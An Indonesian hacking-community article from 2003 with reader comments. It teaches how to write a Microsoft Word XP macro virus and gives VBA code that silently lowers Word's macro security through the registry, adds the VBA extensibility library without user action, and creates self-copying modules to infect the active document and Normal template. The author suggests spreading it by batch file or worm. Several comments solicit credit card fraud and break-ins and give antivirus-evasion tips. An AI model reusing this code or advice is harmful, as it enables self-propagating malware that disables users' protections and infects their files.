Jasakom Community
Jadikan Jasakom Homepage anda Training IT-Security IT-Services
Menu

Bergabung dengan milis Jasakom-perjuangan


 
Monday, September 15, 2003- Jumlah Klik [4969] , Penulis : SPY-ONO|LAGI|MAEN
Jasakom - (Ih judulnya formal banget)Sebenarnya artikel ini dibuat karena saya tertarik dengan artikel sevenC, tentang pembahasannya membuat virus makro pada Microsoft Word 2000.
Sedikit Teknik pembuatan virus makro pada Microsoft Word XP 10

Tetapi karena sistem keamanan Microsoft Word XP berbeda dengan Microsoft Word 2000, maka saya ingin mengulas sedikit tentang teknik peng-copyan modulnya. Sebelumnya coba lihat dulu sebagian source kode ini :

 

System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&

On Error Resume Next

Set NorTemp = NormalTemplate.VBProject

Set Aktif = ActiveDocument.VBProject

Set modulbaru = ActiveDocument.VBProject.VBComponents.Add(vbext_ct_StdModule)

If modulbaru.Name <> "coba" Then

modulbaru.Name = "coba"

If (ActiveDocument.VBProject.VBComponents.Count < 2) And (ActiveDocument.VBProject.VBComponents.Count >= 1) Then

Else:

eror

End if

On Error Resume Next

NormalTemplate.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

Set NorTemp = NormalTemplate.VBProject

On Error Resume Next

ActiveDocument.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

 

 

  Dalam Microsoft Word XP Registry untuk membuat rendah sistem keamanan macro security-nya hampir sama dengan Microsoft Word 2000, yang membedakan hanya versi yang tertera pada registry tersebut.

 

- Pada Microsoft Word 2000:

 

System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& 

 

Pada Microsoft Word XP:

 

System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&

 

 

Kelihatan kan perbedaanya hanya pada versinya saja

 

- Untuk teknik pembuatan module antar dokumen yang aktif hampir sama, cuma saya disini memakai syntax yang berbeda      dengan sevenC (hi..hi..hi), bisa dilihat pada source code di bawah ni :

 

On Error Resume Next

Set NorTemp = NormalTemplate.VBProject

Set Aktif = ActiveDocument.VBProject

Set modulbaru = ActiveDocument.VBProject.VBComponents.Add(vbext_ct_StdModule)

If modulbaru.Name <> "coba" Then

modulbaru.Name = "coba"

 

-kalau sudah untuk mencegah agar virus tidak menulari dokumen tersebut 2 kali tambahkan perintah:

If (ActiveDocument.VBProject.VBComponents.Count < 2) And (ActiveDocument.VBProject.VBComponents.Count >= 1) Then

 

'routine infeksi

 

Else:

eror --> sub error handler yang dibuat dengan membuat sub kosong, contoh

 

sub eror()

'kalian bisa memasukkan perintah apa saja di sini, kalau saya lebih suka kosong sih hihhi...

end sub

 

 

MASALAH:

 

Tetapi untuk menjalankan routine ini kita harus menyalakan Librari Microsoft Visual Basic for Applications Extensibility 5.03 yang ada pada Visual basic Editor di Menu 'tools', sub menu 'reference'. Bila kita tidak memakai librari tersebut akan memunculkan pesan error. Gimana dong cara menyalakannya dengan otomatis tanpa harus mengklik menu tsb pada Word? 

 

SOLUSI:

Masuk ke Visual Basic Editor,ke menu tools, reference, cari library yang bernama Microsoft Visual Basic for Applications Extensibility 5.03, kemudian klik, dan keluar dari menu tersebut.dan Jalankan source kode.

 

atau dengan cara tersembunyi yaitu dengan menggunakan file vbe6ext.olb yang ada pada path C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\ , karena file tersebut yang dapat menjalankan type library untuk Microsoft Visual Basic for Applications Extensibility 5.03, maka ketikkan :

 

On Error Resume Next

NormalTemplate.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

Set NorTemp = NormalTemplate.VBProject

 

kalau yang diatas untuk mengeset normal templatenya, sedangkan yang ini untuk mengeset agar Microsoft Visual Basic for Applications Extensibility 5.03 aktif di dokumen yang lagi aktif :

 

On Error Resume Next

ActiveDocument.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

 

Wah....selesai degh....kamu bisa masuk ke Microsoft Office XP dengan routine tersebut, terserah penyebarannya mau dengan memakai .bat, atau dengan worm, up to you.....makasih buat saran kritik n caci maki....

 

"in digital century someone can be a famous in ten minute"--> deu nyontek bo.....

 

Thanks to:

 

-SevenC, [K]alamar buat artikelnya yang udah memberi ilham

-Bang Joni Hendri yang ngajarin gue tentang hidup (SALUT..)

-Mas Mulyadi yang bersedia meminjamkan rumahnya (he...he...he)

-Mas Acen, Mas Iman (yang udah nganter2)

 #jasakom, #manadohacking, #batamhacker, # vidatra, #neoteker

- wedashyndicate (gimana katanya dah rame), istana.com, discolorized

- MUGI newyorkarto

-Crys_taL (jauh...)

 

 

 

created by :

 

SPY-ONO|LAGI|MAEN

 

Hosted by www.Geocities.ws

Berikan Pendapat Anda Untuk Artikel Ini       

Nama : aRs
Comment :
bagus juga, n' klo lu2 pada bisa ngehack credit card ato situs bank besar kirim ke [email protected]
ID : 11697


Nama : rio99
Comment :
kaga ade gunanya.....udah terdaftar oleh anti virus. Percuma ....!!@#@
ID : 11412


Nama : Guest602
Comment :
Bullshit, 3 routine infeksi makro nggak bisa kerja lagi karena udah di kenali oleh av. mendingan belajar yang executable. kalo kurang yakin coba ADDfromfile, organizercopy, dan import.
ID : 11050


Nama : suka_deadlock
Comment :
ada artikel buat belajar nya ngga?
ID : 11022


Nama : suka_deadlock
Comment :
bagus..., cuma buat apa ya kira-kira?
ID : 11021


Nama : coconut
Comment :
hei gue juga mau tuh... yang bisa ngebobol bisa barter ma gue. credit card bagus!!!! contact me : [email protected]
ID : 11012


Nama : enoss
Comment :
kakak-kakak yang pinter pinter lihatin sistem keamanannya (Game online ragnarok)www.ragnarok.co.id dong kira kira bisa di tembus ngga? hihihih........ ditunggu jawabannya... eh satu lagi kalau bisa bikinin program yang bisa buat creat barang2 ragnarok i ndonesia heuhueh...
ID : 10906


Nama : goesmenx
Comment :
saya belum ngeh ama source diatas. tolong artikel diatas dilengkeapin nama software yang kamu pake dan cara pakainya secara detil... makasih.. [email protected]
ID : 10898


Nama : saico
Comment :
wau.. cool...
ID : 10890


Nama : CyberBlast
Comment :
Gitu dong,punya elmu bagi2. Masak kita diemin sih bangsa kita dibodohi bangsa lain. Eh yg laen gimana, tunjukin dong klo bangsa kita juga mampu mengalahkan mereka, masa kita ga bisa kayak si pembuat blaster yg baru 18 tahunan itu.
ID : 10868


Nama : achonk
Comment :
ahh payah .. kalo ngasih tutor setengah2 ... dan kurang detail yang lengkap dong pake softwarenya apa .. cara makenya gimana .. biar bisa kita praktekin .. kalo cuman kayak gitu mah gampang tinggal kopi paste artikel orang laen juga bisa .. :(
ID : 10866


Nama : dranko achimovic
Comment :
lah....busettt....kaga ngarti dah gua
ID : 10863


Nama : 1x4
Comment :
ambuh lah
ID : 10846


Nama : abangwhaone
Comment :
Kalo ngilangin virus roro gimana ya?
ID : 10842


Nama : endox's
Comment :
wah asyik banget tapi aku ndak ngerti but kurang jelas di mna buatnya
ID : 10800


Nama : 'an sy
Comment :
WADUHH...... VIRUS LAGI ....... cape gua liat code2x
ID : 10788


Nama : sumanto
Comment :
Mbuh inyong ra ngerti,inyong ngertine virus mendoan karo virus getuk goreng nggo tamba wetenge inyong sing lagi kenchot
ID : 10779


Nama : mazfoer
Comment :
embuh ora ngerti inyonge
ID : 10767


Nama : coconut
Comment :
lagian kalo pake word, kemungkinan terdeteksinya 2X kan? sama av dan sama keamanan internal word. mending kalo mau ga terdeteksi pake aja *exe. yang buat word jadi salah satu jalan infeksinya......
ID : 10748


Nama : coconut
Comment :
buat aja virus yang menginfeksi dari luar semacam vbs yang menon aktifkan keamanan word. beres kan...
ID : 10747


Nama : bLuE5kY
Comment :
thanks buat tutorialnya he he he viva LINUXER Indonesia
ID : 10741


Nama : mztolo
Comment :
bagus lho...
ID : 10735


Nama : Antichikebum
Comment :
trik buat Bersihin virus macro 1. hapus file normal template , buka microsoft word anda, pencet alt-F11, terbuka jendela vb editor, buka file word yg terinfeksi, hapus script vb tersebut, lalu save
ID : 10733


Nama : [email protected]
Comment :
Bagaimana kalau direktori windowsnya ada di d:\ atau di e:\ ?, scriptmu tidak fleksibel sama sekali hehehe.. yah tapi lumayanlah bagi pemula. Oya aku no berapa ya? :P
ID : 10729


Nama : atlas
Comment :
ndasku mumettttttttzzzzzzzzzz T_T
ID : 10728


Nama : jealous1
Comment :
wah bagus tapi lebih bagus kalo penjelasannya lebih detil
ID : 10727


Nama : blinker
Comment :
when i'm blink now i'm in the Top :) buyar wae microsoft, kebanyakan butt hole ehh bug hole.... pindah ke linux asikk lah...yauw...
ID : 10726


 
 
 

Pencarian

  Keyword :              
 
 

 
Menjadi Komentator nomor 1 + hacking jasakom--7/20/2004
Harddisk 400 GB sudah tersedia--7/19/2004
Mengatasi "Hacking account admin portal PhpNuke"--7/19/2004
Best Seller "Seni Internet Hacking"--7/19/2004
Pembuatan Web Portal Menggunakan PhpNuke--7/18/2004
Symbian semakin berkuasa--7/15/2004
Spoofing: KKN Yang Menguntungkan--7/15/2004
Kecoak Elektronik membantah telah melakukan defacing dan minta dana--7/14/2004
VBS sederhana yang berbahaya--7/14/2004
Seminar security di semarang--7/14/2004
Permintaan Dukungan Dana Berlanjut, Situs-Situs Bertumbangan--7/11/2004
MedanHacking Membantah Niat Menyerang KPU--7/11/2004
BUG SMS Satelindo--7/11/2004
Ajukan Permintaan Dana, Situs Golkar.or.id di deface--7/8/2004
Akses Remote Shell Dengan PHP Injection--7/8/2004
Mengirim Email Palsu Menggunakan Script PHP Tanpa MySQL --7/8/2004

Your IP : 202.55.173.2
User Online: 104
© Copyright by Jasakom 2002 All Right Reserved
Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini
Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.
Hosted by www.Geocities.ws

1